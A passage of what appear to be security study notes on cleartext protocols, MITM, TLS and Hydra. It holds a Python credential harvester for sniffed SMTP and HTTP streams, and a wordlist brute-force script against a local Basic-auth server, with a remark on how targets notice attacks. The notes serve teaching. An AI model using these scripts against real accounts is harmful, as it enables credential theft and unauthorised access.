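    (22, b"SSH-2.0-OpenSSH_9.6\r\n"),        # encrypted after the banner: nothing to harvest
]


def harvest(samples):
    return [cred for port, stream in samples for cred in extract_credentials(stream, port)]


if __name__ == "__main__":
    for cred in harvest(SAMPLES):
        print(cred)
```

Base64 in AUTH PLAIN and Basic auth is encoding, not protection; it is stripped here with one library call, which is exactly why the TLS section below matters for every protocol in the table.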

MITM

For MITM consider:

  • Ettercap
  • Bettercap

  • MITM can also affect other cleartext protocols such as FTP, SMTP, and POP3.
  • Mitigation against this attack requires the use of cryptography.
  • The solution lies in proper authentication along with encryption or signing of the exchanged messages.
  • Transport Layer Security (TLS) protects from MITM attacks with the help of Public Key Infrastructure (PKI) and trusted root certificates.

TLS:

SSL (Secure Sockets Layer) started when the world wide web started to see new applications, such as online shopping and sending payment information.
Netscape introduced SSL in 1994, with SSL 3.0 being released in 1996. But eventually, more security was needed, and TLS (Transport Layer Security) protocol was introduced in 1999.
They fit into the Presentation Layer of the OSI model.
An existing cleartext protocol can be upgraded to use encryption via SSL/TLS.

Protocol  Default port  Secured protocol  Secured port
HTTP      80            HTTPS             443
FTP       21            FTPS              990
SMTP      25            SMTPS             465
POP3      110           POP3S             995
IMAP      143           IMAPS             993

  • Consider the case of HTTP. Initially, to retrieve a web page over HTTP, the web browser would need to perform at least the following two steps:
    1. Establish a TCP connection with the remote web server
    2. Send HTTP requests to the web server, such as GET and POST requests
  • HTTPS requires an additional step to encrypt the traffic. The new step takes place after establishing a TCP connection and before sending HTTP requests. This extra step can be inferred from the ISO/OSI model in the image presented earlier. Consequently, HTTPS requires at least the following three steps:
    1. Establish a TCP connection
    2. Establish an SSL/TLS connection
    3. Send HTTP requests to the web server

To establish an SSL/TLS connection, the client needs to perform the proper handshake with the server, as shown below based on RFC 6101 (ChangeCipherSpec is in square brackets because it is a separate protocol message rather than part of the handshake protocol):

  1. client -> server: ClientHello
  2. server -> client: ServerHello, Certificate, ServerKeyExchange, CertificateRequest, ServerHelloDone
  3. client -> server: Certificate, ClientKeyExchange, CertificateVerify, [ChangeCipherSpec], Finished
  4. server -> client: [ChangeCipherSpec], Finished

Hydra

Option          Explanation
-l [username]   username (use -L [path] for a list of usernames)
-P [path]       path to password wordlist
server service  set server address and service to attack, e.g. MACHINE_IP ssh
-s [port]       use in case of non-default service port number
-v              verbose mode; -V additionally shows each username and password attempt
-d              display debugging output
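The options above drive a loop that is worth seeing in the open. As an added example (not Hydra's code and not from the original notes), the script below does what hydra's http-get module does for one login: one request per wordlist entry with the credentials in a Basic Authorization header, stop at the first 2xx. The target is a throwaway Basic-auth HTTP server the script starts itself on 127.0.0.1; the credentials and wordlist are constructed.

```python
# Added example (not from the original page, not Hydra's code): the brute-force loop behind
# 'hydra -l USER -P WORDLIST TARGET http-get /admin', against a local throwaway target.
# VALID_USER, VALID_PASS and WORDLIST are constructed; the server listens on 127.0.0.1 only.
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID_USER, VALID_PASS = "admin", "Summer2024"
WORDLIST = ["123456", "password", "admin", "Summer2024", "letmein"]


class BasicAuthHandler(BaseHTTPRequestHandler):
    """Answers 200 to the right Authorization header and 401 with a challenge otherwise."""
    expected = "Basic " + base64.b64encode(f"{VALID_USER}:{VALID_PASS}".encode()).decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="test"')
            self.end_headers()

    def log_message(self, *args):          # keep the demo quiet
        pass


def start_target() -> HTTPServer:
    server = HTTPServer(("127.0.0.1", 0), BasicAuthHandler)   # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(url: str, user: str, password: str, timeout: float = 3.0) -> bool:
    """One attempt: send Basic credentials, treat a 2xx as success and a 401 as a miss."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return 200 <= resp.status < 300
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise   # 403, 429, 5xx: a lockout or WAF reaction, not a wrong password; stop and look


def brute_force(url: str, user: str, wordlist):
    """Return (password, attempts) for the first working candidate, or (None, attempts)."""
    for attempts, candidate in enumerate(wordlist, 1):
        if try_login(url, user, candidate):
            return candidate, attempts
    return None, len(wordlist)


def demo():
    """Start the local target, run the attack against it, shut the target down."""
    server = start_target()
    try:
        url = f"http://127.0.0.1:{server.server_address[1]}/admin"
        return brute_force(url, VALID_USER, WORDLIST)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

The re-raise on anything other than 401 is the part Hydra's -v output is for: a target that starts returning 403 or 429 part-way through a wordlist has usually noticed you, and every further attempt just adds to the alert.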